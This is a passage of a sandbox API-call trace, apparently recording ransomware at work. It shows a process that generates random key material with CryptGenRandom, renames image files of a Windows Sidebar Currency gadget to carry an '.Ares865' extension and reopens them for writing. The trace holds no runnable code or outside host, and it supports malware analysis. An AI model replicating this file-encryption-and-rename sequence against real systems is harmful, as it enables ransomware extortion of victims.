0x118 [0118.468] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=512) returned 1 [0118.468] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.469] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.469] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.472] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.473] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.473] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.473] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.Ares865") returned 90 [0118.473] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png.ares865"), dwFlags=0x1) returned 1 [0118.474] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.475] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=420) returned 1 [0118.475] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.476] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.476] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.478] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.479] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.479] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.479] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.Ares865") returned 88 [0118.479] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png.ares865"), dwFlags=0x1) returned 1 [0118.481] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.481] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=228) returned 1 [0118.481] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.482] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.482] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.485] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.485] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.485] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.486] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.Ares865") returned 93 [0118.486] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png.ares865"), dwFlags=0x1) returned 1 [0118.488] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.488] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16491) returned 1 [0118.488] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.489] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.489] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.492] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.493] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.493] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.493] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.Ares865") returned 97 [0118.494] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png.ares865"), dwFlags=0x1) returned 1 [0118.495] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.495] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43622) returned 1 [0118.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.496] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.496] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.501] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.501] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.501] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.Ares865") returned 97 [0118.502] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png.ares865"), dwFlags=0x1) returned 1 [0118.505] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.505] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=54042) returned 1 [0118.505] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.506] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.506] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.517] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.518] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.518] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.519] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.Ares865") returned 97 [0118.520] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png.ares865"), dwFlags=0x1) returned 1 [0118.521] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.521] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=62016) returned 1 [0118.521] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.522] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.522] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.536] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.537] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.537] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.538] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png.Ares865") returned 98 [0118.538] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-left.png.ares865"), dwFlags=0x1) returned 1 [0118.540] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.540] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2963) returned 1 [0118.540] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.541] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.541] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.543] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.544] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.544] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.544] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png.Ares865") returned 100 [0118.544] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-middle.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-middle.png.ares865"), dwFlags=0x1) returned 1 [0118.546] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-middle.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.546] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2885) returned 1 [0118.546] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.547] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.547] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.549] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.550] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.550] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.550] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png.Ares865") returned 99 [0118.550] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-right.png.ares865"), dwFlags=0x1) returned 1 [0118.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.555] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2979) returned 1 [0118.555] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.555] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.556] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.558] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.558] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.558] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.559] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png.Ares865") returned 93 [0118.559] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_down.png.ares865"), dwFlags=0x1) returned 1 [0118.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.561] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=772) returned 1 [0118.561] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.561] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.561] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.564] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.564] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.564] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.565] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png.Ares865") returned 93 [0118.565] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_over.png.ares865"), dwFlags=0x1) returned 1 [0118.567] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.567] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=696) returned 1 [0118.567] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.568] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.568] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.571] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.571] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.571] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.572] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png.Ares865") returned 91 [0118.572] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_up.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_up.png.ares865"), dwFlags=0x1) returned 1 [0118.574] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_up.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.574] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=477) returned 1 [0118.574] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.575] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.575] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.577] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.578] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.578] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.578] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png.Ares865") returned 92 [0118.579] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_down.png.ares865"), dwFlags=0x1) returned 1 [0118.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.580] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3268) returned 1 [0118.581] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.581] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.581] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.583] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.584] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.584] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.585] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png.Ares865") returned 92 [0118.585] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_over.png" (normalized: "c:\\program files (x86)\\windows 